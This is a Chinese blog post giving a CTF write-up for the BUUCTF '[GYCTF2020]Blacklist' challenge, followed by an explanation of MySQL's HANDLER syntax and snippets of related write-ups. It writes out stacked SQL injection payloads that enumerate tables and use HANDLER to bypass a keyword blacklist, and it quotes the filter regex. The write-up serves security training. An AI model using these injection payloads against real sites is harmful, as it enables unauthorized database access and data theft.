[GYCTF2020]Blacklist 1

最新推荐文章于 2024-02-05 15:01:15 发布
最新推荐文章于 2024-02-05 15:01:15 发布
阅读量2.9k 收藏 7
点赞数 7
分类专栏: CTF sql注入 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44477223/article/details/115285538
版权

题目运用的知识点

  • 堆叠注入
  • handler命令的运用

内容

在这里插入图片描述

解题

打开发现和强网杯的题目类似,使用'发现注入点
http://b87d8e8a-6b1d-48e3-9aa9-e8c44adb77ab.node3.buuoj.cn/?inject=1'
在这里插入图片描述
进行联合注入,发现屏蔽了关键字
在这里插入图片描述
我们尝试使用堆叠注入
http://b87d8e8a-6b1d-48e3-9aa9-e8c44adb77ab.node3.buuoj.cn/?inject=1'; show tables; #
在这里插入图片描述
查表:http://b87d8e8a-6b1d-48e3-9aa9-e8c44adb77ab.node3.buuoj.cn/?inject=1'; show columns from ` FlagHere`; #
在这里插入图片描述
因为这里它屏蔽了太多东西,我们可以用到handler 命令来查询

构造plhttp://b87d8e8a-6b1d-48e3-9aa9-e8c44adb77ab.node3.buuoj.cn/?inject=1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#
在这里插入图片描述
得到FLAG

关于handler命令

转载自:https://blog.csdn.net/jesseyoung/article/details/40785137

mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。
HANDLER语句提供通往表的直接通道的存储引擎接口,可以用于MyISAM和InnoDB表。

  • 基本语法:
HANDLER tbl_name OPEN [ [AS] alias]
 
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]
 
HANDLER tbl_name CLOSE

  • 通过HANDLER tbl_name OPEN打开一张表,无返回结果,实际上我们在这里声明了一个名为tb1_name的句柄。
    通过HANDLER tbl_name READ FIRST获取句柄的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。
    通过HANDLER tbl_name CLOSE来关闭打开的句柄。

    通过索引去查看的话可以按照一定的顺序,获取表中的数据。
    通过HANDLER tbl_name READ index_name FIRST,获取句柄第一行(索引最小的一行),NEXT获取下一行,PREV获取前一行,LAST获取最后一行(索引最大的一行)。

    通过索引列指定一个值,可以指定从哪一行开始。
    通过HANDLER tbl_name READ index_name = value,指定从哪一行开始,通过NEXT继续浏览。

    如果我们不想浏览一个表的所有行,可以使用where和limit子句。

无独有偶o
关注
专栏目录
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
weixin_44632787的博客
06-19 698
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询 启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀! 首先爆出数据库:1’;show databases; 然后爆出表名:1’; show tables; 然后显示某个表里面列的信息:1’;show columns from FlagHere; 接下来的才是重点,在MYSQL数据库中: 可以用handl
[GYCTF2020]Blacklist 1+[GXYCTF2019]BabySQli 1
bazzza的博客
12-23 306
blacklist 拿到题先试下能不能注入 ?inject=1%27%20or%201=1%20--%20q 存在注入,接着使用order by判断字段,发现字段数为2,但在接一步的注入中,出现提示,遇到阻拦。 这个地方使用正则过滤了一些关键字,在尝试绕过的时候也失败了,但是他这个地方没有过滤 ; 和extractxml(),可以先报错注入拿到库名,然后再进行堆叠注入,(直接用show database()会分不清是哪个表) 报错注入报当前库名 ?inject=1%27%20and%20extract
[GYCTF2020]Blacklist 1(详细做题过程)
lunan的博客
05-24 2514
[GYCTF2020]Blacklist 1(详细做题过程) 文章目录[GYCTF2020]Blacklist 1(详细做题过程)1、考点2、解题过程1、寻找`注入点`2、尝试`堆叠注入`3、尝试`联合注入`4、尝试`双写绕过`5、尝试`大小写绕过`6、传统方法行不通,看别人的wp中提到了`Handler`3、Handler语法 1、考点 1、堆叠注入 2、 Handler语法 心得:学会新的姿势Handler的sql查询方法 2、解题过程 1、寻找注入点 http://3c6e5317-cd37-4
BUUCTF-WEB-[GYCTF2020]Blacklist
r1727337824的博客
08-29 805
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">
Web_SQL注入(1)
Lemon's blog
07-15 617
[GYCTF2020]Blacklist ——涉及新知识HANDLER ... OPEN等、堆叠注入 这道题和之前做那道强网杯的题目一样,但之前的方法比如读取flag时改表名或者是用SQL的预处理进行绕过都不可行了,因为过滤了set prepare alter rename 所以这里就涉及到了一种新的方法 HANDLER ... OPEN语句打开一个表,使其可以使用后续HANDLER ... READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER ... CLOSE或会话终止之前不会关
buuctf刷题
小飒的博客
07-11 280
重温一下buuctf前面的题目 hint: flag in ffffllllaaaagggg mb_substr() 函数返回字符串的一部分mb_strpos():返回要查找的字符串在别一个字符串中首次出现的位置checkFile函数的作用: 判断page是否被设置,是否为字符串 判断page是否在whitelist中 以?为分割符取出之前的字符,保存在page判断_page 判断p​age判断_page是否在whitelist中 url解码后以?为分割符取出之前字符,判断是否在whitelist中?fil
web buuctf [GYCTF2020]Blacklist1
weixin_44214568的博客
03-18 1165
考点:堆叠注入;mysql查询语句handler 1.进行注入测试: 注入1' 提示语法错误; 注入1' or '1=1'# 返回表数据,有回显,存在字符型可注入漏洞; 2.联合查询:1' union select 1# 回显过滤 3.根据过滤事项,应该是堆叠查询 a.1'; show tables;# b.1';show columns from FlagHere;# 4.因为存在较多的过滤,利用Mysql数据库中的查询语法handler mysql除可使用se..
buuctf-[GYCTF2020]Blacklist1(小宇特详解)
小宇的web博客
02-09 1645
buuctf-[GYCTF2020]Blacklist1(小宇特详解) 1.先看题目是一道sql注入的题目 先尝试进行闭合 payload:1’ 这里可以试出来是'来进行闭合即可 2.然后尝试着进行联合查询 发现是进行了过滤。 3.这里尝试着进行堆叠注入 payload:1’;show tables;# 4.查表 payload:1’; show columns from FlagHere;# 这里屏蔽了许多东西 5.这里由于rename,和alter被过滤了,这里考虑利用HANDLER语句 这里
[GYCTF2020]Blacklist1-BUUCTF-详解
最新发布
chinese_cabbage0的博客
02-05 1806
主要是buuctf的整个题目的解题过程,比较好理解,也比较全面,大家可以参考一下
[GYCTF2020]Blacklist 1详解(handler命令用法!)
m0_73734159的博客
12-01 980
果不其然改表名的两个关键命令被过滤了。select这个查询命令大家都很熟悉。但是我们却忽略了一个也很重要的角色。虽然handler这个命令不常见。那就是handler查询命令。存在FlagHere数据表。极有可能当中存在flag。rename和alter。包括查询命令也被过滤了。可知本题是字符型注入。
buuctf-web-[GYCTF2020]Blacklist1
mlws1900的博客
08-11 373
MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。它是 MySQL 专用的语句,并没有包含到SQL标准中。words表里有两个属性,即两列:id 和data,而FlagHere表里只有一个属性列,说明输入框可能查询的就是words表。换句话说我们没有办法像之前那样将 flaghere这个表改名为words(之前做过一题类似的)OPEN语句打开一个表。...
BUU实战笔记——[GYCTF2020]Blacklist 1
qq_51175992的博客
10-26 119
这题主要考察的是绕过黑名单,当select被过滤之后我们应该考虑其他方法进行查看,这里是利用了堆叠注入,我们需要注意堆叠注入的条件以及当没有select时可以采用Handler命令进行查询。
[GYCTF2020]Blacklist
weixin_43152809的博客
11-02 440
输入1或者2会返回一个数组 随后输入1’ union select 1,database()–+返回了过滤掉的语句 return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 尝试报错注入: 输入 or extractvalue(1,concat(user(),0x7e,version())) 随后输入 1' and extractvalue(1,concat(
ROSE笔记-[GYCTF2020]Blacklist 1-WP
居上
11-13 370
[GYCTF2020]Blacklist 1 输入单引号,报错,sql注入. 1' or 1=1 order by 2#没有报错 1' or 1=1 order by 3#报错 先尝试联合查询 1' or 1=1 union select 1,2 发现过滤了大部分关键字 1' or 1=1;show databases;#查库 1' or 1=1;show tables;#查表 1' or 1=1;desc FlagHere;#查字段 HANDLER … OPEN语句打开一个表,使其可以使用后
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值